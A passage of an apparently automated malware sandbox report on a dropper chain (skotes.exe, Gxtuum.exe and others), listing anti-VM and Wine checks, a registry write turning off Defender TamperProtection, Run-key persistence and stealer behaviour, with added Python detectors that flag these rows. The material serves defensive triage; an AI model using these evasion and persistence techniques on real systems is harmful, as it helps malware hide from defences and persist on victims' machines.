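Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\explorer.exe N/A
"""

# Probe type -> pattern matched against the end of the registry path.
PROBES = {
    # ACPI DSDT table named VBOX__ exists only under VirtualBox.
    "virtualbox_acpi": re.compile(r"\\HARDWARE\\ACPI\\DSDT\\VBOX__$", re.IGNORECASE),
    # BIOS vendor strings reveal hypervisors (VirtualBox, VMware, QEMU ...).
    "bios_strings": re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", re.IGNORECASE),
    # HKCU\Software\Wine exists only when running under Wine.
    "wine_registry": re.compile(r"\\Software\\Wine$", re.IGNORECASE),
}

EVENT_RE = re.compile(
    r"^(?P<op>Key opened|Key value queried) (?P<key>\\REGISTRY\\\S+) (?P<process>.+?)\s+N/A$"
)


def classify_probe(key):
    """Return the probe type for a registry path, or None if it is not one
    of the environment checks tracked here."""
    for name, pattern in PROBES.items():
        if pattern.search(key):
            return name
    return None


def correlate_probes(text):
    """Return {process: {probe_type: event_count}} over all matching lines."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        probe = classify_probe(m.group("key"))
        if probe is not None:
            hits[m.group("process")][probe] += 1
    return {process: dict(counts) for process, counts in hits.items()}


def rank_evasive_processes(text, min_distinct=2):
    """Return [(process, distinct_probe_types, total_events)] for processes
    that used at least min_distinct probe types, most varied first. A single
    probe type is common in benign software and is left out by default."""
    ranked = []
    for process, counts in correlate_probes(text).items():
        if len(counts) >= min_distinct:
            ranked.append((process, len(counts), sum(counts.values())))
    ranked.sort(key=lambda row: (-row[1], -row[2], row[0]))
    return ranked


if __name__ == "__main__":
    for process, distinct, total in rank_evasive_processes(SAMPLE_EVENTS):
        print(f"{distinct} probe types / {total} events  {process}")
```

Run over the full tables above, every dropped executable in this report reaches the threshold while the renamed system binaries (mshta.exe, powershell.exe) do not, which is the separation a triage rule wants.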

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dbcb8133.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\32dbcb8133.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3c485884af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091759001\\3c485884af.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\759b6f5ccf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091760001\\759b6f5ccf.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
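The TamperProtection write in the "Windows security modification" table above and the four HKCU Run entries in this table are the two row types a responder would want pulled out of a report like this automatically: the first is a Defender kill switch, the second is logon persistence pointing into a directory the malware itself created under %LOCALAPPDATA%\Temp. The Python below is an added example, not part of the sandbox output and not tooling from any of the families named on this page. It parses "Set value" rows in the report's own flat format, flags Defender values that mean "protection off" and Run entries whose target lives in a user-writable staging directory or is a script, and tags each with the ATT&CK technique id. The first three sample rows are copied from the tables above; the two benign control rows (a Program Files autostart and a TamperProtection value of 5, the enabled state) are constructed, and the value sets in DEFENDER_OFF are my assumption of what is worth alerting on.

```python
import re
from dataclasses import dataclass

# Constructed sample: registry "Set value" rows in the shape the sandbox report
# uses (description, key path, value, writing process, target). The first three
# are copied from the tables above; the last two are benign control rows.
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dbcb8133.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\32dbcb8133.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    # constructed benign control: a Program Files application registering its own autostart
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background" C:\Program Files\Microsoft OneDrive\OneDrive.exe N/A',
    # constructed benign control: TamperProtection written back to 5 (enabled)
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "5" C:\Program Files\Windows Defender\MsMpEng.exe N/A',
]

# One report row: Set value (<kind>) <key> = "<value>" <process> N/A
ROW_RE = re.compile(
    r'^Set value \((?P<kind>\w+)\) (?P<key>\\REGISTRY\\.+?) = "(?P<value>.*?)" (?P<proc>.+?) N/A$'
)

# Defender switches and the values that mean "protection off" (assumed alert set).
# TamperProtection: 5 = on, 4 or 0 = off. Disable* policies: 1 = feature disabled.
DEFENDER_OFF = {
    "tamperprotection": {"0", "4"},
    "disableantispyware": {"1"},
    "disablerealtimemonitoring": {"1"},
    "disablebehaviormonitoring": {"1"},
    "disableioavprotection": {"1"},
}

# Directories an unprivileged user can write to: a logon autostart living here is
# the pattern this report shows, and is rare for legitimately installed software.
USER_WRITABLE = ("\\appdata\\local\\temp", "\\appdata\\roaming", "\\programdata", "\\users\\public")
SCRIPT_EXT = (".cmd", ".bat", ".vbs", ".js", ".hta", ".ps1")


@dataclass
class Finding:
    technique: str   # ATT&CK technique id, in the style of the report's MITRE section
    summary: str
    process: str     # process that performed the registry write


def parse_row(row: str):
    """Split one 'Set value' row into kind, key, value, proc; None if it is not one."""
    m = ROW_RE.match(row)
    return m.groupdict() if m else None


def classify(row: str):
    rec = parse_row(row)
    if rec is None:
        return None
    key = rec["key"].lower()
    leaf = key.rsplit("\\", 1)[-1]
    # the report doubles backslashes inside quoted string values
    value = rec["value"].replace("\\\\", "\\")

    if "\\windows defender\\" in key and leaf in DEFENDER_OFF:
        if value in DEFENDER_OFF[leaf]:
            return Finding("T1562.001", f"Defender {leaf} set to {value}", rec["proc"])
        return None

    if "\\currentversion\\run\\" in key:
        name = rec["key"].rsplit("\\", 1)[-1]
        lv = value.lower()
        # the executable is everything before the first argument switch
        exe = lv.split(" -")[0].split(" /")[0].strip('"')
        staged = any(d in exe for d in USER_WRITABLE)
        scripted = exe.endswith(SCRIPT_EXT)
        if staged or scripted:
            why = "target in user-writable dir" if staged else "script launched at logon"
            return Finding("T1547.001", f"Run\\{name} -> {value} ({why})", rec["proc"])
    return None


def triage(rows):
    """All findings from a list of report rows, in report order."""
    return [f for f in map(classify, rows) if f is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f.technique}  {f.summary}  [written by {f.process}]")
```

The Run-key check deliberately keys on where the target lives, not on its name: 32dbcb8133.exe and am_no.cmd change from build to build, but a logon autostart that resolves into %LOCALAPPDATA%\Temp does not. The same goes for the Defender rule: it matches on the value written, so a later row that restores TamperProtection to 5 is not reported, which keeps the output usable when the report interleaves remediation with the attack.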

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
